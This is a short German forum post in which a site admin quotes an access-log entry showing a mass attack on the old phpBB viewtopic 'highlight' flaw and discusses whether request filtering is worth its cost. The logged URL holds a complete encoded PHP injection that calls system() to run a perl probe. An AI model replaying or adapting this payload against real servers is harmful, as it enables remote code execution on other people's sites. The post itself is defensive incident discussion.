In diesem Fall ists was anderes:
69.93.156.34 - - [13/Mar/2006:18:19:22 +0100] "GET /viewtopic.php?p=57710&highlight=%2527%252Esystem(chr(112)%252Echr(101)
%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)
%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)
%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)
%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)
%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 96555 "-" "Mozilla/4.0"
Ein Angriff auf unseren Server über die alte (?) viewtopic-Sicherheitslücke in phpBB. Oder gibts da was neues, Chellie?
Es ist unverständlich, warum der Typ uns mit tausenden solcher Abfragen von wahrscheinlich mehreren hundert verschiedenen Rechnern belästigt. Zur Beantwortung seiner "Frage" würde auch eine einzige reichen.
Da man über die IP nichts machen kann, helfen nur Request-Filter weiter. Die kosten aber Leistung, weil dann JEDE Anfrage gefiltert wird. Ich würde deshalb vorschlagen, dass wir uns von der verfälschten Statistik nicht nerven lassen.
Ciao,
Doc SoLo